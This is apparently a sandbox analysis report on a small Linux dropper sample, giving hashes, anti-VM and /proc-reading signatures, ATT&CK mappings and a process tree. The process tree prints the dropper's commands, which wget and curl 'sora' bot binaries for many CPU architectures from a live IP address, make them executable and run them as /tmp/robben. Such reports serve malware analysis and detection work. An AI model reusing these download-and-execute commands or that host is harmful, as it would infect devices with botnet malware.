848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54

General

Target

02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Size

1KB
MD5

02ca1bec2de42845c35867af0dc72be3
SHA1

d2fc439476dd4ec34fce01257762a34b0aa6f3d5
SHA256

848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54
SHA512

302e57020da9a74ee02c1f39c81aacb5a4385cedb7a0323ee3ba208d8e58fe5abdf83e2975bc8416ba684e164a512420b550f15569f3243f39a00d4cd99a3dc7

Score

7^/10

antivm

Malware Config

Signatures

Executes dropped EXE 10 IoCs

Processes:

robbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobben

ioc	pid	process
/tmp/robben	665	robben
/tmp/robben	679	robben
/tmp/robben	685	robben
/tmp/robben	696	robben
/tmp/robben	709	robben
/tmp/robben	724	robben
/tmp/robben	738	robben
/tmp/robben	759	robben
/tmp/robben	767	robben
/tmp/robben	773	robben

Checks CPU configuration 1 TTPs 10 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 20 IoCs

Reads data from /proc virtual filesystem.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

description ioc

File opened for modification /tmp/robben

description	ioc
File opened for modification	/tmp/robben

/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
1⤵
PID:639

/usr/bin/wget
wget http://188.127.235.211/bins/sora.x86
2⤵
PID:641

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.x86
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:650

/bin/cat
cat sora.x86
2⤵
PID:661

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
2⤵
PID:664

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:665

/usr/bin/wget
wget http://188.127.235.211/bins/sora.mips
2⤵
PID:668

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.mips
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:674

/bin/cat
cat sora.mips
2⤵
PID:677

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
2⤵
PID:678

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:679

/usr/bin/wget
wget http://188.127.235.211/bins/sora.mpsl
2⤵
PID:681

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.mpsl
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:682

/bin/cat
cat sora.mpsl
2⤵
PID:683

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
2⤵
PID:684

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:685

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm4
2⤵
PID:687

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm4
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:688

/bin/cat
cat sora.arm4
2⤵
PID:693

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
2⤵
PID:694

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:696

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm5
2⤵
PID:698

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm5
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:702

/bin/cat
cat sora.arm5
2⤵
PID:707

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
2⤵
PID:708

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:709

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm6
2⤵
PID:712

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm6
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:716

/bin/cat
cat sora.arm6
2⤵
PID:721

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
2⤵
PID:722

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:724

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm7
2⤵
PID:727

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm7
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:730

/bin/cat
cat sora.arm7
2⤵
PID:735

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
2⤵
PID:737

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:738

/usr/bin/wget
wget http://188.127.235.211/bins/sora.ppc
2⤵
PID:743

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.ppc
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:749

/bin/cat
cat sora.ppc
2⤵
PID:754

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
2⤵
PID:756

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:759

/usr/bin/wget
wget http://188.127.235.211/bins/sora.m68k
2⤵
PID:761

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.m68k
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:764

/bin/cat
cat sora.m68k
2⤵
PID:765

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
2⤵
PID:766

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:767

/usr/bin/wget
wget http://188.127.235.211/bins/sora.sh4
2⤵
PID:769

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.sh4
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:770

/bin/cat
cat sora.sh4
2⤵
PID:771

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
2⤵
PID:772

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:773

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

1

T1497

Credential Access

Discovery

Virtualization/Sandbox Evasion

1

T1497

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

memory/688-1-0xb675d000-0xb676e044-memory.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads